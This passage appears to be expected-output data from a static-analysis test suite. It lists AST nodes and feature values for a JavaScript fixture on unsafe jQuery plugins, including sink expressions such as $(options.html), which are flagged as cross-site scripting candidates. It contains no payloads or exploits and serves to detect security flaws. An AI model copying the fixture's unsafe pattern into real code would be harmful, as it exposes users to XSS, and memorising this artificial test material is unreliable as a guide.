options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:74:2 | functio ... / OK\\n\\t} | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:74:2 | functio ... / OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:74:2 | functio ... / OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:74:2 | return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:74:2 | return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:74:2 | return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:19:74:2 | return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:28:71:36 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:28:71:36 | my_plugin | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:28:71:36 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:28:71:36 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:38:71:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:38:71:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:38:71:44 | options | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:38:71:44 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:38:71:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:38:71:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:38:71:44 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:71:38:71:44 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:3:72:3 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:3:72:3 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:3:72:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:3:72:3 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:3:72:24 | $(optio ... ar.baz) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:3:72:24 | $(optio ... ar.baz) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:3:72:24 | $(optio ... ar.baz) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:3:72:24 | $(optio ... ar.baz) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:3:72:24 | exceptional return of $(optio ... ar.baz) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:3:72:24 | exceptional return of $(optio ... ar.baz) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:3:72:24 | exceptional return of $(optio ... ar.baz) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:3:72:24 | exceptional return of $(optio ... ar.baz) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:5:72:11 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:5:72:11 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:5:72:11 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:5:72:11 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:5:72:15 | options.foo | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:5:72:15 | options.foo | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:5:72:15 | options.foo | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:5:72:15 | options.foo | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:5:72:19 | options.foo.bar | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:5:72:19 | options.foo.bar | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:5:72:19 | options.foo.bar | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:5:72:19 | options.foo.bar | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:13:72:15 | foo | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:13:72:15 | foo | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:13:72:15 | foo | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:13:72:15 | foo | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:17:72:19 | bar | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:17:72:19 | bar | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:17:72:19 | bar | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:17:72:19 | bar | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:21:72:23 | baz | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:21:72:23 | baz | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:21:72:23 | baz | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:72:21:72:23 | baz | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:3:73:3 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:3:73:3 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:3:73:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:3:73:3 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:3:73:17 | $(options.html) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:3:73:17 | $(options.html) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:3:73:17 | $(options.html) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:3:73:17 | $(options.html) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:3:73:17 | exceptional return of $(options.html) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:3:73:17 | exceptional return of $(options.html) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:3:73:17 | exceptional return of $(options.html) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:3:73:17 | exceptional return of $(options.html) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:5:73:11 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:5:73:11 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:5:73:11 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:5:73:11 | options | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:5:73:16 | options.html | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:5:73:16 | options.html | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:5:73:16 | options.html | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:5:73:16 | options.html | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:5:73:16 | options.html | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:5:73:16 | options.html | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:13:73:16 | html | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:13:73:16 | html | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:13:73:16 | html | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:73:13:73:16 | html | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:2:76:2 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:2:76:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:2:76:2 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:2:76:2 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:2:76:5 | $.fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:2:76:5 | $.fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:2:76:5 | $.fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:2:76:5 | $.fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:2:76:15 | $.fn.my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:2:76:15 | $.fn.my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:2:76:15 | $.fn.my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:2:76:15 | $.fn.my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:2:78:2 | $.fn.my ... T OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:2:78:2 | $.fn.my ... T OK\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:2:78:2 | $.fn.my ... T OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:2:78:2 | $.fn.my ... T OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:4:76:5 | fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:4:76:5 | fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:4:76:5 | fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:4:76:5 | fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:7:76:15 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:7:76:15 | my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:7:76:15 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:7:76:15 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:76:18 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:76:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:76:18 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:76:18 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:78:2 | 'arguments' object of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:78:2 | 'arguments' object of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:78:2 | 'arguments' object of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:78:2 | 'arguments' object of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:78:2 | exceptional return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:78:2 | exceptional return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:78:2 | exceptional return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:78:2 | exceptional return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:78:2 | functio ... T OK\\n\\t} | assignedToPropName | my_plugin 